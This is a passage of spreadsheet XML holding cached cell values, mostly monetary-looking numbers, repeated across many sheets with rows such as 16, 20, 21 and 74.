            <v>26129.76</v>
          </cell>
          <cell r="E16">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>231.5</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>24358.26</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1077.58</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>10402.95</v>
          </cell>
          <cell r="E21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="I21">
            <v>137.5</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>9396.45</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
          <cell r="E22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="34">
          <cell r="P34">
            <v>0</v>
          </cell>
          <cell r="Q34">
            <v>1585.503</v>
          </cell>
          <cell r="R34">
            <v>300.06</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0</v>
          </cell>
          <cell r="S74">
            <v>561.93</v>
          </cell>
          <cell r="T74">
            <v>0</v>
          </cell>
          <cell r="U74">
            <v>0</v>
          </cell>
          <cell r="V74">
            <v>6.90671091445428</v>
          </cell>
          <cell r="W74">
            <v>0</v>
          </cell>
          <cell r="X74">
            <v>0</v>
          </cell>
          <cell r="Y74">
            <v>222.404925880448</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="5">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65896.78</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>26129.76</v>
          </cell>
          <cell r="E16">
            <v>2156</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>465.02</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>26049.24</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2156</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>237.52</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>2996.06</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>10402.95</v>
          </cell>
          <cell r="E21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="I21">
            <v>108.5</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>9287.95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10</v>
          </cell>
          <cell r="S74">
            <v>571.93</v>
          </cell>
          <cell r="T74">
            <v>41.6666666666667</v>
          </cell>
          <cell r="U74">
            <v>6.94444444444444</v>
          </cell>
          <cell r="V74">
            <v>7.00894607843137</v>
          </cell>
          <cell r="W74">
            <v>215.6</v>
          </cell>
          <cell r="X74">
            <v>215.6</v>
          </cell>
          <cell r="Y74">
            <v>222.285944084066</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="6">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65896.78</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>26129.76</v>
          </cell>
          <cell r="E16">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>456.65</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>25592.59</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79.65</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>2916.41</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>10402.95</v>
          </cell>
          <cell r="E21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="I21">
            <v>199</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>9088.95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10</v>
          </cell>
          <cell r="S74">
            <v>571.93</v>
          </cell>
          <cell r="T74">
            <v>0</v>
          </cell>
          <cell r="U74">
            <v>5.95238095238095</v>
          </cell>
          <cell r="V74">
            <v>6.98839198435973</v>
          </cell>
          <cell r="W74">
            <v>0</v>
          </cell>
          <cell r="X74">
            <v>215.6</v>
          </cell>
          <cell r="Y74">
            <v>222.285944084066</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="7">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65896.78</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>26129.76</v>
          </cell>
          <cell r="E16">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>779.75</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>24812.84</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368.75</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>2547.66</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>10402.95</v>
          </cell>
          <cell r="E21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="I21">
            <v>139.5</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>8949.45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10</v>
          </cell>
          <cell r="S74">
            <v>571.93</v>
          </cell>
          <cell r="T74">
            <v>0</v>
          </cell>
          <cell r="U74">
            <v>5.20833333333333</v>
          </cell>
          <cell r="V74">
            <v>6.96795808966862</v>
          </cell>
          <cell r="W74">
            <v>0</v>
          </cell>
          <cell r="X74">
            <v>215.6</v>
          </cell>
          <cell r="Y74">
            <v>222.285944084066</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="8">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65896.78</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>26129.76</v>
          </cell>
          <cell r="E16">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>809.93</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>24002.91</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531.93</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>2015.73</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>10402.95</v>
          </cell>
          <cell r="E21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="I21">
            <v>177</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>8772.45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10</v>
          </cell>
          <cell r="S74">
            <v>571.93</v>
          </cell>
          <cell r="T74">
            <v>0</v>
          </cell>
          <cell r="U74">
            <v>4.62962962962963</v>
          </cell>
          <cell r="V74">
            <v>6.94764334305151</v>
          </cell>
          <cell r="W74">
            <v>0</v>
          </cell>
          <cell r="X74">
            <v>215.6</v>
          </cell>
          <cell r="Y74">
            <v>222.285944084066</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="9">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65896.78</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>26129.76</v>
          </cell>
          <cell r="E16">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>979.93</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>23022.98</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641.93</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>1373.8</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>10402.95</v>
          </cell>
          <cell r="E21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="I21">
            <v>121</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>8651.45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10</v>
          </cell>
          <cell r="S74">
            <v>571.93</v>
          </cell>
          <cell r="T74">
            <v>0</v>
          </cell>
          <cell r="U74">
            <v>4.16666666666667</v>
          </cell>
          <cell r="V74">
            <v>6.92744670542636</v>
          </cell>
          <cell r="W74">
            <v>0</v>
          </cell>
          <cell r="X74">
            <v>215.6</v>
          </cell>
          <cell r="Y74">
            <v>222.285944084066</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="10">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64232.78</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>26129.76</v>
          </cell>
          <cell r="E16">
            <v>2178</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>1236.46</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>23964.52</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2178</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>809.96</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>2741.84</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>10402.95</v>
          </cell>
          <cell r="E21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="I21">
            <v>222.5</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>8428.95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20</v>
          </cell>
          <cell r="S74">
            <v>581.93</v>
          </cell>
          <cell r="T74">
            <v>41.6666666666667</v>
          </cell>
          <cell r="U74">
            <v>7.57575757575758</v>
          </cell>
          <cell r="V74">
            <v>7.02814009661836</v>
          </cell>
          <cell r="W74">
            <v>217.8</v>
          </cell>
          <cell r="X74">
            <v>216.7</v>
          </cell>
          <cell r="Y74">
            <v>222.208856735346</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="11">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64232.78</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>26129.76</v>
          </cell>
          <cell r="E16">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>685.95</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>23278.57</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306.95</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>2434.89</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>10402.95</v>
          </cell>
          <cell r="E21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="I21">
            <v>188</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>8240.95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20</v>
          </cell>
          <cell r="S74">
            <v>581.93</v>
          </cell>
          <cell r="T74">
            <v>0</v>
          </cell>
          <cell r="U74">
            <v>6.94444444444444</v>
          </cell>
          <cell r="V74">
            <v>7.00782755298651</v>
          </cell>
          <cell r="W74">
            <v>0</v>
          </cell>
          <cell r="X74">
            <v>216.7</v>
          </cell>
          <cell r="Y74">
            <v>222.208856735346</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="12">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62579.78</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>26129.76</v>
          </cell>
          <cell r="E16">
            <v>2188</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>1107.72</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>24358.85</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2188</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>879.72</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>3743.17</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>10402.95</v>
          </cell>
          <cell r="E21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="I21">
            <v>131</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>8109.95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30</v>
          </cell>
          <cell r="S74">
            <v>591.93</v>
          </cell>
          <cell r="T74">
            <v>41.6666666666667</v>
          </cell>
          <cell r="U74">
            <v>9.61538461538462</v>
          </cell>
          <cell r="V74">
            <v>7.10770893371758</v>
          </cell>
          <cell r="W74">
            <v>218.8</v>
          </cell>
          <cell r="X74">
            <v>217.4</v>
          </cell>
          <cell r="Y74">
            <v>222.151267886405</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="13">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62579.78</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>26129.76</v>
          </cell>
          <cell r="E16">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>1557.37</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>22801.48</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1147.87</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>2595.3</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>10402.95</v>
          </cell>
          <cell r="E21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="I21">
            <v>239.5</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>7870.45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30</v>
          </cell>
          <cell r="S74">
            <v>591.93</v>
          </cell>
          <cell r="T74">
            <v>0</v>
          </cell>
          <cell r="U74">
            <v>8.92857142857143</v>
          </cell>
          <cell r="V74">
            <v>7.08728448275862</v>
          </cell>
          <cell r="W74">
            <v>0</v>
          </cell>
          <cell r="X74">
            <v>217.4</v>
          </cell>
          <cell r="Y74">
            <v>222.151267886405</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="14">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60936.78</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>26129.76</v>
          </cell>
          <cell r="E16">
            <v>2166</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>1278.92</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>23688.56</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2166</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>934.92</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>3826.38</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>10402.95</v>
          </cell>
          <cell r="E21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="I21">
            <v>124</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>7746.45</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
          <cell r="E22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="34">
          <cell r="P34">
            <v>0</v>
          </cell>
          <cell r="Q34">
            <v>1585.503</v>
          </cell>
          <cell r="R34">
            <v>255.77</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40</v>
          </cell>
          <cell r="S74">
            <v>601.93</v>
          </cell>
          <cell r="T74">
            <v>41.6666666666667</v>
          </cell>
          <cell r="U74">
            <v>11.1111111111111</v>
          </cell>
          <cell r="V74">
            <v>7.18636580706781</v>
          </cell>
          <cell r="W74">
            <v>216.6</v>
          </cell>
          <cell r="X74">
            <v>217.2</v>
          </cell>
          <cell r="Y74">
            <v>222.059043410363</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="15">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60936.78</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>26129.76</v>
          </cell>
          <cell r="E16">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>1324.51</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>22364.05</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822.01</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>3004.37</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>10402.95</v>
          </cell>
          <cell r="E21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="I21">
            <v>214.5</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>7531.95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40</v>
          </cell>
          <cell r="S74">
            <v>601.93</v>
          </cell>
          <cell r="T74">
            <v>0</v>
          </cell>
          <cell r="U74">
            <v>10.4166666666667</v>
          </cell>
          <cell r="V74">
            <v>7.16583333333333</v>
          </cell>
          <cell r="W74">
            <v>0</v>
          </cell>
          <cell r="X74">
            <v>217.2</v>
          </cell>
          <cell r="Y74">
            <v>222.059043410363</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="16">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60936.78</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>26129.76</v>
          </cell>
          <cell r="E16">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>1199.03</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>21165.02</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743.03</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>2261.34</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>10402.95</v>
          </cell>
          <cell r="E21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="I21">
            <v>145</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>7386.95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40</v>
          </cell>
          <cell r="S74">
            <v>601.93</v>
          </cell>
          <cell r="T74">
            <v>0</v>
          </cell>
          <cell r="U74">
            <v>9.80392156862745</v>
          </cell>
          <cell r="V74">
            <v>7.14541785375119</v>
          </cell>
          <cell r="W74">
            <v>0</v>
          </cell>
          <cell r="X74">
            <v>217.2</v>
          </cell>
          <cell r="Y74">
            <v>222.059043410363</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="17">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59335.78</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>26129.76</v>
          </cell>
          <cell r="E16">
            <v>2147</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>1058.76</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>22253.26</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2147</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>700.26</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>3708.08</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>10402.95</v>
          </cell>
          <cell r="E21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="I21">
            <v>140.5</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>7246.45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50</v>
          </cell>
          <cell r="S74">
            <v>611.93</v>
          </cell>
          <cell r="T74">
            <v>41.6666666666667</v>
          </cell>
          <cell r="U74">
            <v>11.5740740740741</v>
          </cell>
          <cell r="V74">
            <v>7.24348958333333</v>
          </cell>
          <cell r="W74">
            <v>214.7</v>
          </cell>
          <cell r="X74">
            <v>216.7</v>
          </cell>
          <cell r="Y74">
            <v>221.938783847826</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="18">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59335.78</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>26129.76</v>
          </cell>
          <cell r="E16">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>900.79</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>21352.47</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668.79</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>3039.29</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>10402.95</v>
          </cell>
          <cell r="E21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="I21">
            <v>113</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>7133.45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50</v>
          </cell>
          <cell r="S74">
            <v>611.93</v>
          </cell>
          <cell r="T74">
            <v>0</v>
          </cell>
          <cell r="U74">
            <v>10.9649122807018</v>
          </cell>
          <cell r="V74">
            <v>7.22296978281397</v>
          </cell>
          <cell r="W74">
            <v>0</v>
          </cell>
          <cell r="X74">
            <v>216.7</v>
          </cell>
          <cell r="Y74">
            <v>221.938783847826</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="19">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57613.78</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>26129.76</v>
          </cell>
          <cell r="E16">
            <v>2181</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>1027.19</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>22506.28</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2181</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>755.19</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>4465.1</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>10402.95</v>
          </cell>
          <cell r="E21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="I21">
            <v>123</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>7010.45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60</v>
          </cell>
          <cell r="S74">
            <v>621.93</v>
          </cell>
          <cell r="T74">
            <v>41.6666666666667</v>
          </cell>
          <cell r="U74">
            <v>12.5</v>
          </cell>
          <cell r="V74">
            <v>7.32026836158192</v>
          </cell>
          <cell r="W74">
            <v>218.1</v>
          </cell>
          <cell r="X74">
            <v>216.933333333333</v>
          </cell>
          <cell r="Y74">
            <v>221.877060119306</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="20">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57613.78</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>26129.76</v>
          </cell>
          <cell r="E16">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>878.07</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>21628.21</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575.57</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>3889.53</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>10402.95</v>
          </cell>
          <cell r="E21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="I21">
            <v>154.5</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>6855.95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60</v>
          </cell>
          <cell r="S74">
            <v>621.93</v>
          </cell>
          <cell r="T74">
            <v>0</v>
          </cell>
          <cell r="U74">
            <v>11.9047619047619</v>
          </cell>
          <cell r="V74">
            <v>7.29964788732394</v>
          </cell>
          <cell r="W74">
            <v>0</v>
          </cell>
          <cell r="X74">
            <v>216.933333333333</v>
          </cell>
          <cell r="Y74">
            <v>221.877060119306</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="21">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57613.78</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>26129.76</v>
          </cell>
          <cell r="E16">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>1306.72</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>20321.49</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907.22</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>2982.31</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>10402.95</v>
          </cell>
          <cell r="E21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="I21">
            <v>262.5</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>6593.45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60</v>
          </cell>
          <cell r="S74">
            <v>621.93</v>
          </cell>
          <cell r="T74">
            <v>0</v>
          </cell>
          <cell r="U74">
            <v>11.3636363636364</v>
          </cell>
          <cell r="V74">
            <v>7.27914325842697</v>
          </cell>
          <cell r="W74">
            <v>0</v>
          </cell>
          <cell r="X74">
            <v>216.933333333333</v>
          </cell>
          <cell r="Y74">
            <v>221.877060119306</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="22">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55872.78</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>26129.76</v>
          </cell>
          <cell r="E16">
            <v>2187</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>1010.41</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>21498.08</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2187</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>703.91</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>4465.4</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>10402.95</v>
          </cell>
          <cell r="E21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="I21">
            <v>159.5</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>6433.95</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
          <cell r="E22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="34">
          <cell r="P34">
            <v>0</v>
          </cell>
          <cell r="Q34">
            <v>1585.503</v>
          </cell>
          <cell r="R34">
            <v>291.97</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70</v>
          </cell>
          <cell r="S74">
            <v>631.93</v>
          </cell>
          <cell r="T74">
            <v>41.6666666666667</v>
          </cell>
          <cell r="U74">
            <v>12.6811594202899</v>
          </cell>
          <cell r="V74">
            <v>7.37546685340803</v>
          </cell>
          <cell r="W74">
            <v>218.7</v>
          </cell>
          <cell r="X74">
            <v>217.185714285714</v>
          </cell>
          <cell r="Y74">
            <v>221.82678461222</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="23">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55872.78</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>26129.76</v>
          </cell>
          <cell r="E16">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>1032.1</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>20465.98</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676.6</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>3788.8</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>10402.95</v>
          </cell>
          <cell r="E21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="I21">
            <v>172.5</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>6261.45</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
          <cell r="E22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="34">
          <cell r="P34">
            <v>0</v>
          </cell>
          <cell r="Q34">
            <v>1585.503</v>
          </cell>
          <cell r="R34">
            <v>184.58</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70</v>
          </cell>
          <cell r="S74">
            <v>631.93</v>
          </cell>
          <cell r="T74">
            <v>0</v>
          </cell>
          <cell r="U74">
            <v>12.1527777777778</v>
          </cell>
          <cell r="V74">
            <v>7.35486499068901</v>
          </cell>
          <cell r="W74">
            <v>0</v>
          </cell>
          <cell r="X74">
            <v>217.185714285714</v>
          </cell>
          <cell r="Y74">
            <v>221.82678461222</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="24">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55872.78</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>26129.76</v>
          </cell>
          <cell r="E16">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>1147.37</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>19318.61</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847.37</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>2941.43</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>10402.95</v>
          </cell>
          <cell r="E21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="I21">
            <v>202</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>6059.45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70</v>
          </cell>
          <cell r="S74">
            <v>631.93</v>
          </cell>
          <cell r="T74">
            <v>0</v>
          </cell>
          <cell r="U74">
            <v>11.6666666666667</v>
          </cell>
          <cell r="V74">
            <v>7.33437790157846</v>
          </cell>
          <cell r="W74">
            <v>0</v>
          </cell>
          <cell r="X74">
            <v>217.185714285714</v>
          </cell>
          <cell r="Y74">
            <v>221.82678461222</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="25">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53774.78</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>26129.76</v>
          </cell>
          <cell r="E16">
            <v>2635</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>679.51</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>21274.1</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>0</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>0</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>0</v>
          </cell>
          <cell r="E19">
            <v>0</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>0</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>1077.58</v>
          </cell>
          <cell r="E20">
            <v>2635</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>312.51</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>5263.92</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>10402.95</v>
          </cell>
          <cell r="E21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="I21">
            <v>201</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>5858.45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12</v>
          </cell>
          <cell r="R74">
            <v>82</v>
          </cell>
          <cell r="S74">
            <v>643.93</v>
          </cell>
          <cell r="T74">
            <v>50</v>
          </cell>
          <cell r="U74">
            <v>13.1410256410256</v>
          </cell>
          <cell r="V74">
            <v>7.45289351851852</v>
          </cell>
          <cell r="W74">
            <v>219.583333333333</v>
          </cell>
          <cell r="X74">
            <v>217.536585365854</v>
          </cell>
          <cell r="Y74">
            <v>221.784976627894</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="26">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52110.78</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>26129.76</v>
          </cell>
          <cell r="E16">
            <v>2199</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>1101.03</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>22372.07</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2199</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>720.03</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>6742.89</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>10402.95</v>
          </cell>
          <cell r="E21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="I21">
            <v>170</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>5688.45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92</v>
          </cell>
          <cell r="S74">
            <v>653.93</v>
          </cell>
          <cell r="T74">
            <v>41.6666666666667</v>
          </cell>
          <cell r="U74">
            <v>14.1975308641975</v>
          </cell>
          <cell r="V74">
            <v>7.54766851338873</v>
          </cell>
          <cell r="W74">
            <v>219.9</v>
          </cell>
          <cell r="X74">
            <v>217.79347826087</v>
          </cell>
          <cell r="Y74">
            <v>221.756151270014</v>
          </cell>
        </row>
      </sheetData>
